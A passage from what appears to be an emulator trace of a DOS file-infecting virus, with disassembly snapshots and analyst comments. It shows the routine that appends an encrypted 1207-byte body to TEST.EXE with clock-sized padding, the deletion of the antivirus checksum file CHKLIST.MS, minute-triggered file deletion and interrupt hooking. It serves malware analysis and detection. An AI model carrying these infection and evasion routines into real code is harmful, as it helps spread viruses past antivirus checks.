0x15528: mov cx, 8    ; second loop: di is not reloaded, so it continues after the first 8 bytes
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90    ; CF=0: store 0x90 (NOP)
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5    ; CF=1: store 0xF5 (CMC); the window ends before the loop instruction
; Snapshot on return from the second Get time call (INT 21h AH=2Ch): the second
; filler loop, followed by a write whose length is taken from the clock.
2018-12-25T12:23:35.108033723Z 44 PC: 15528 | Get time 0x15528: mov cx, 8    ; 8 iterations
0x1552b: inc di    ; di is set before this window
0x1552c: shl dx, 1    ; CF = top bit of DX (DH = seconds after Get time)
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90    ; CF=0: store 0x90 (NOP opcode)
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5    ; CF=1: store 0xF5 (CMC opcode)
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c    ; Get time: DL = 1/100 s
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf    ; cx = DL & 0x0F, so 0..15 bytes are written
0x15548: mov ah, 0x40    ; INT 21h AH=40h Write; the handle comes from BX, set outside this window
0x1554a: lea dx, word ptr [bp + 0x556]    ; source buffer at [bp+0x556]
0x1554e: int 0x21    ; logged at PC 15550 as "Write 4 bytes on handle 5" in this run
0x15550: jmp 0x15555    ; skips the bytes at 0x15552-0x15554
0x15552: nop
0x15553: add byte ptr [bx + si], al    ; NOTE(review): jumped over on this path; encodes as 00 00, so likely two data bytes shown as an instruction by the linear disassembly
; Snapshot on return from the third Get time call: the short clock-sized write,
; then the setup for the main body write.
2018-12-25T12:23:35.110201645Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf    ; length = DL & 0x0F (0..15)
0x15548: mov ah, 0x40    ; INT 21h AH=40h Write; handle in BX is set outside this window
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al    ; skipped by the jmp above; likely data (00 00), not code
0x15555: mov ah, 0x2c    ; Get time
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx    ; clock value (DH:DL) saved at [bp+0x30]; presumably a per-run key for the routine called next - confirm
0x1555e: call 0x2514a    ; NOTE(review): target printed without 16-bit wrap-around; relative to 0x15561 the displacement is 0xFBE9 (-0x417), so the real target is probably 0x1514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7    ; 0x4b7 = 1207 bytes, matching the "Write 1207 bytes" log entry at PC 1556c
0x15566: lea dx, word ptr [bp + 0x10]    ; source starts at [bp+0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c    ; Get time again; DX is overwritten with the clock value
0x1556e: int 0x21
0x15570: mov cx, dx    ; window ends here
2018-12-25T12:23:35.112380205Z 64 PC: 15550 | Write file or device (Write 4 bytes on handle 5)
; Snapshot on return from the Get time call at 0x15557. This stretch writes the
; 1207-byte body and then a clock-sized tail, so the number of bytes added to a
; file is not constant: in this run the log shows writes of 4, 1207 and 20
; bytes. Size-delta checks should allow for that variable padding.
2018-12-25T12:23:35.119913423Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx    ; save clock value (DH:DL) at [bp+0x30]
0x1555e: call 0x2514a    ; NOTE(review): 16-bit displacement 0xFBE9 from 0x15561, so the real target is probably 0x1514a
0x15561: mov ah, 0x40    ; INT 21h AH=40h Write
0x15563: mov cx, 0x4b7    ; 1207 bytes
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21    ; logged at PC 1556c as "Write 1207 bytes on handle 5"
0x1556c: mov ah, 0x2c    ; Get time: DX now holds seconds / hundredths
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f    ; length = DL & 0x3F (0..63)
0x15577: mov ah, 0x40    ; Write; DX is not reloaded, so the buffer offset is the raw clock value and the tail is whatever bytes lie there
0x15579: int 0x21    ; logged at PC 1557b as "Write 20 bytes on handle 5"
0x1557b: call 0x2514a    ; same routine as at 0x1555e. NOTE(review): the snapshot taken at PC 15570 decodes 0x1557e onward differently, consistent with the first call transforming the body in place and this call reversing it - confirm
0x1557e: mov ax, 0x4202    ; INT 21h AH=42h, AL=02h: seek relative to end of file
0x15581: xor cx, cx
0x15583: xor dx, dx    ; offset 0, so the call returns the file length in DX:AX
0x15585: int 0x21
0x15587: push ax    ; low word of the file length
0x15588: mov cl, 9    ; window ends here; presumably a shift count for 512-byte units - confirm
2018-12-25T12:23:35.122735946Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
; Snapshot on return from the Get time call at 0x1556e, i.e. after the call at
; 0x1555e and the 1207-byte write have already run.
2018-12-25T12:23:35.131159645Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f    ; length = DL & 0x3F (0..63)
0x15577: mov ah, 0x40    ; INT 21h AH=40h Write; DX still holds the clock value from Get time
0x15579: int 0x21
0x1557b: call 0x2514a    ; NOTE(review): 16-bit displacement 0xFBCC from 0x1557e, so the real target is probably 0x1514a
0x1557e: lodsb al, byte ptr [si]    ; NOTE(review): these addresses decoded as `mov ax, 0x4202 ...` in the snapshot taken at PC 15559; the bytes differ here, so this is probably the body in its transformed state rather than meaningful instructions
0x1557f: add byte ptr [bp + 0x31], dl
0x15582: fnsave dword ptr [bx + di]
2018-12-25T12:23:35.134192841Z 64 PC: 1557b | Write file or device (Write 20 bytes on handle 5)
2018-12-25T12:23:35.137084928Z 66 PC: 15587 | Move file pointer
2018-12-25T12:23:35.138398618Z 66 PC: 155a8 | Move file pointer
2018-12-25T12:23:35.13985561Z 64 PC: 155b3 | Write file or device (Write 26 bytes on handle 5)
2018-12-25T12:23:35.142882383Z 67 PC: 15345 | Get or set file attributes
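2018-12-25T12:23:35.148367592Z 65 PC: 15349 | Delete file (Filename = 'chklist.ms')
[Analyst note: CHKLIST.MS is the per-directory checksum list kept by Microsoft Anti-Virus (MSAV). Deleting it removes the integrity baseline that would otherwise flag the executable modified just above. An attribute change followed by deletion of this file, next to writes to an executable, is a useful behavioural detection signal.]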
2018-12-25T12:23:35.154041189Z 87 PC: 155cc | Get or set file date and time
2018-12-25T12:23:35.156015789Z 62 PC: 155d0 | Close file
2018-12-25T12:23:35.164231753Z 67 PC: 155da | Get or set file attributes
2018-12-25T12:23:35.174685048Z 79 PC: 1541f | Find next file
2018-12-25T12:23:35.177531044Z 59 PC: 152c0 | Change current directory
2018-12-25T12:23:35.181815984Z 14 PC: 151d5 | Set default drive (Drive = 'C')
2018-12-25T12:23:35.18360435Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:35.185017012Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:35.190103026Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:35.193735808Z 59 PC: 151e0 | Change current directory
2018-12-25T12:23:35.199778037Z 26 PC: 153fd | Set disk transfer address (See above)
2018-12-25T12:23:35.200804094Z 78 PC: 15408 | Find first file (See above)
2018-12-25T12:23:35.209800648Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:35.215721273Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:35.548980902Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:35.55615668Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:35.558297248Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:35.565441316Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:35.567427183Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:35.570836799Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:35.573791191Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:35.576186716Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:35.583594355Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:35.586279884Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:35.596406007Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:35.599613313Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:35.602790855Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:35.604470603Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:35.606669656Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:35.609423396Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:35.621685756Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:35.629181563Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:35.630564391Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:35.637343752Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:35.646806064Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:35.649873924Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:35.655753285Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:35.666217149Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:35.673052488Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:35.674747263Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:35.68122882Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:35.683413573Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:35.685715759Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:35.688890122Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:35.691211889Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:35.698149145Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:35.701421554Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:35.708949829Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:35.71161312Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:35.715037418Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:35.716439736Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:35.717700439Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:35.720883742Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:35.726643731Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:35.732480543Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:35.734553945Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.038254269Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.047586009Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.051457177Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.058197042Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.067572996Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.074532599Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.077149927Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.08285473Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.084634762Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.08811909Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.090557509Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.092938715Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.099757749Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.102178765Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.110677938Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.114328106Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.117580502Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.119135772Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.121283072Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.124359297Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.130941581Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.137414678Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.139047527Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.146021797Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.156015563Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.159038932Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.164648908Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.174525892Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.181276634Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.183004822Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.189401102Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.191215809Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.194295493Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.197378382Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.199793703Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.206113557Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.209193802Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.21687376Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.219289219Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.223287446Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.225331693Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.226977229Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.231044004Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.237295406Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.243400557Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.245289326Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.252407316Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.262247497Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.265824463Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.271672113Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.281017495Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.288247933Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.289893665Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.295622667Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.297604095Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.302264717Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.304804064Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.30719674Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.314537229Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.31719452Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.324329957Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.327534346Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.33141024Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.333160991Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.335701258Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.338480375Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.344114901Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.35062132Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.352352961Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.660178557Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.670530474Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:36.671760768Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.675569375Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.679602328Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:36.680785623Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:36.684276366Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:36.68644076Z 59 PC: 15220 | Change current directory
; Minute-gated dispatch, shown at the return address of a Get time call
; (INT 21h AH=2Ch: CH=hour, CL=minute, DH=second, DL=1/100 s). Five fixed minute
; values each select a routine call.
; NOTE(review): in this run the log shows two attribute/delete pairs at PC
; 15345/15349 immediately after this snapshot, while the run that ends just
; before this one on the page shows none at that point - consistent with one of
; these branches firing here; confirm against the clock setting used.
2018-12-25T12:23:36.690391972Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5    ; minute == 5 ?
0x1523f: jne 0x15244
0x15241: call 0x1534a    ; routine body not shown
0x15244: cmp cl, 0xd    ; minute == 13 ?
0x15247: jne 0x1524c
0x15249: call 0x15359    ; routine body not shown
0x1524c: cmp cl, 0x1e    ; minute == 30 ?
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]    ; operand for the helper at 0x15330
0x15255: call 0x15330    ; PCs 15345/15349 (attribute change, delete) fall inside this helper's range - presumably it deletes the file named at DS:DX; confirm
0x15258: cmp cl, 0x28    ; minute == 40 ?
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]    ; same operand as minute 30
0x15261: call 0x15330
0x15264: cmp cl, 0x32    ; minute == 50 ?
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]    ; a second, different operand
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]    ; common continuation
0x15274: lea di, word ptr [bp + 0x18d]    ; window ends here
2018-12-25T12:23:36.69250064Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.70248023Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.712995562Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.721984746Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.756609292Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.757617949Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.758580322Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.759966945Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.761041453Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.761957748Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.763575885Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.764518014Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.765418973Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.766759876Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.767855021Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.76881512Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.770391336Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.771348409Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.772258155Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.773806907Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.774844667Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.775810385Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:36.777068269Z 53 PC: 14fba | Get interrupt vector (See above)
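2018-12-25T12:23:36.77802018Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.779099392Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:36.780449271Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:36.781400597Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
[Analyst note: "Interrupt =" gives the vector number in decimal (0x00, 0x23, 0x24, 0x3F), while the "AKA" text is the INT 21h function name for that number and does not describe the vector. As vectors: 0x00 divide error, 0x23 DOS Ctrl-Break handler, 0x24 DOS critical-error handler, 0x3F commonly an overlay-manager vector.]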
2018-12-25T12:23:36.783408795Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:36.989262803Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:36.991390555Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:36.99373564Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:36.995637214Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:36.99705576Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:36.999280171Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.001066377Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.0024628Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.00460617Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.006334573Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.007680063Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.009947414Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.011142946Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.012403323Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.014491036Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.015947277Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.017246563Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.019277967Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.020755556Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.022040839Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.024123852Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.03037439Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.032629935Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.035616401Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.038183337Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.040430966Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.044141844Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.046278215Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.048448499Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.051454231Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.053952707Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.056192012Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.059141933Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.061288323Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.063352432Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.066477569Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.068593284Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.070589543Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.078939381Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.08103247Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.082983008Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.085871567Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.087837743Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.090214453Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.09316855Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.095591802Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.097824049Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.100885532Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.10311794Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.105324458Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.107934452Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.110095304Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.112170728Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.11666299Z 76 PC: 15150 | Terminate with return code (Return code = '200')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":13,"Second":0,"TimeBased":true,"OriginalID":9667,"SideJobID":0}

.


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:23:35.416150471Z 25 PC: 15198 | Get default drive
2018-12-25T12:23:35.417849071Z 71 PC: 151a7 | Get current directory
2018-12-25T12:23:35.420637145Z 26 PC: 153fd | Set disk transfer address
2018-12-25T12:23:35.421543151Z 78 PC: 15408 | Find first file
2018-12-25T12:23:35.428095897Z 67 PC: 1542b | Get or set file attributes
2018-12-25T12:23:35.433502282Z 67 PC: 15433 | Get or set file attributes
2018-12-25T12:23:35.548646845Z 61 PC: 15438 | Open file (Filename = 'TEST.EXE')
2018-12-25T12:23:35.560651323Z 87 PC: 1543e | Get or set file date and time
2018-12-25T12:23:35.562256668Z 63 PC: 15455 | Read file or device (Read 26 bytes on handle 5)
2018-12-25T12:23:35.568995584Z 66 PC: 154a6 | Move file pointer
2018-12-25T12:23:35.571782047Z 44 PC: 1550b | Get time 0x1550b: mov cx, 8
0x1550e: lea di, word ptr [bp + 0x555]
0x15512: inc di
0x15513: shl dx, 1
0x15515: jb 0x1551e
0x15517: mov word ptr [di], 0xf8
0x1551b: jmp 0x15522
0x1551d: nop
0x1551e: mov word ptr [di], 0xfc
0x15522: loop 0x15512
0x15524: mov ah, 0x2c
0x15526: int 0x21
0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
2018-12-25T12:23:35.574284671Z 44 PC: 15528 | Get time 0x15528: mov cx, 8
0x1552b: inc di
0x1552c: shl dx, 1
0x1552e: jb 0x15537
0x15530: mov word ptr [di], 0x90
0x15534: jmp 0x1553b
0x15536: nop
0x15537: mov word ptr [di], 0xf5
0x1553b: loop 0x1552b
0x1553d: mov ah, 0x2c
0x1553f: int 0x21
0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
2018-12-25T12:23:35.576649346Z 44 PC: 15541 | Get time 0x15541: mov cx, dx
0x15543: xor ch, ch
0x15545: and cl, 0xf
0x15548: mov ah, 0x40
0x1554a: lea dx, word ptr [bp + 0x556]
0x1554e: int 0x21
0x15550: jmp 0x15555
0x15552: nop
0x15553: add byte ptr [bx + si], al
0x15555: mov ah, 0x2c
0x15557: int 0x21
0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
2018-12-25T12:23:35.578994744Z 64 PC: 15550 | Write file or device (Write 8 bytes on handle 5)
2018-12-25T12:23:35.587702639Z 44 PC: 15559 | Get time 0x15559: mov word ptr ds:[bp + 0x30], dx
0x1555e: call 0x2514a
0x15561: mov ah, 0x40
0x15563: mov cx, 0x4b7
0x15566: lea dx, word ptr [bp + 0x10]
0x1556a: int 0x21
0x1556c: mov ah, 0x2c
0x1556e: int 0x21
0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov ax, 0x4202
0x15581: xor cx, cx
0x15583: xor dx, dx
0x15585: int 0x21
0x15587: push ax
0x15588: mov cl, 9
2018-12-25T12:23:35.590552955Z 64 PC: 1556c | Write file or device (Write 1207 bytes on handle 5)
2018-12-25T12:23:35.599217372Z 44 PC: 15570 | Get time 0x15570: mov cx, dx
0x15572: xor ch, ch
0x15574: and cl, 0x3f
0x15577: mov ah, 0x40
0x15579: int 0x21
0x1557b: call 0x2514a
0x1557e: mov al, byte ptr [0x5a00]
